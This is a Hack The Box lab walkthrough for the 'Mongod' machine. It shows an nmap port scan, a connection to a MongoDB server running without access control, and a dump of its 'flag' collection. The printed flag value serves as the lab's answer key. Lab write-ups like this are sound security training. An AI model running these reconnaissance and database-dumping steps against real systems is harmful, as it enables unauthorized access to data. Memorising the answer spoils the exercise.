[HTB] Mongod

it’s been quite a while since I tackled any challenges on Hack The Box. My original plan was to strengthen my fundamentals on TryHackMe and then come back to Hack The Box. But now I’m thinking, why not do both at the same time? I can learn by diving in and trying things out as I go.

How many TCP ports are open on the machine?

2
 1┌─[us-starting-point-vip-1-dhcp][10.10.14.28][leewookb@htb-l3lgefdeyz][~]
 2└──╼ []$ sudo nmap -sC -sV 10.129.228.30 -p-
 3Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-10 23:00 CDT
 4Nmap scan report for 10.129.228.30
 5Host is up (0.0087s latency).
 6Not shown: 65533 closed tcp ports (reset)
 7PORT      STATE SERVICE VERSION
 822/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 9| ssh-hostkey:
10|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
11|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
12|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
1327017/tcp open  mongodb MongoDB 3.6.8 3.6.8

Which service is running on port 27017 of the remote host?

MongoDB 3.6.8

27017/tcp open mongodb MongoDB 3.6.8 3.6.8


What type of database is MongoDB? (Choose: SQL or NoSQL)

NoSQL

MongoDB is a NoSQL database designed for scalability, flexibility, and ease of development. MongoDB stores data in flexible, JSON-like documents, meaning fields can vary from document to document and data structure can be changed over time. This differs from traditional relational databases that use tables and rows to store data.


What is the command name for the Mongo shell that is installed with the mongodb-clients package?

mongo

What is the command used for listing all the databases present on the MongoDB server? (No need to include a trailing ;)

show dbs

In order to connect to the remote MongoDB server we need to install the mongodb utility by running the following command: curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz

then extract the contents of the tar archive file using the tar utility tar xvf mongodb-linux-x86_64-3.4.7.tgz

Then navigate to the bin folder to execute the mongo binary and connect to the MongoDB server ./mongo mongodb://10.129.228.30:27017

We are connected to the mongoDB server.

 1┌─[us-starting-point-vip-1-dhcp][10.10.14.28][leewookb@htb-l3lgefdeyz][~/Downloads/mongodb-linux-x86_64-3.4.7/bin]
 2└──╼ []$ ./mongo mongodb://10.129.228.30:27017
 3MongoDB shell version v3.4.7
 4connecting to: mongodb://10.129.228.30:27017
 5MongoDB server version: 3.6.8
 6WARNING: shell and server versions do not match
 7Welcome to the MongoDB shell.
 8For interactive help, type "help".
 9For more comprehensive documentation, see
10	http://docs.mongodb.org/
11Questions? Try the support group
12	http://groups.google.com/group/mongodb-user
13Server has startup warnings:
142024-07-11T03:57:47.294+0000 I STORAGE  [initandlisten]
152024-07-11T03:57:47.294+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
162024-07-11T03:57:47.294+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
172024-07-11T03:57:49.369+0000 I CONTROL  [initandlisten]
182024-07-11T03:57:49.369+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
192024-07-11T03:57:49.369+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
202024-07-11T03:57:49.369+0000 I CONTROL  [initandlisten]
21>

the help command shows show dbs command lists all the databases present on the server.

 1> help
 2	db.help()                    help on db methods
 3	db.mycoll.help()             help on collection methods
 4	sh.help()                    sharding helpers
 5	rs.help()                    replica set helpers
 6	help admin                   administrative help
 7	help connect                 connecting to a db help
 8	help keys                    key shortcuts
 9	help misc                    misc things to know
10	help mr                      mapreduce
11
12	show dbs                     show database names

What is the command used for listing out the collections in a database? (No need to include a trailing ;)

show collections

What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?

db.flag.find().pretty()

help command alt text


db.mycoll.help() command alt text


db.mycoll.find().help() command alt text


submit root flag

1b6e6fb359e7c40241b6d431427ba6ea

show dbs -> use sensitive_information -> show collections -> db.flag.find()

 1> show dbs
 2admin                  0.000GB
 3config                 0.000GB
 4local                  0.000GB
 5sensitive_information  0.000GB
 6users                  0.000GB
 7> use sensitive_information
 8switched to db sensitive_information
 9> show collections
10flag
11> db.flag.find()
12{ "_id" : ObjectId("630e3dbcb82540ebbd1748c5"), "flag" : "1b6e6fb359e7c40241b6d431427ba6ea" }
13>

alt text

#Hack The Box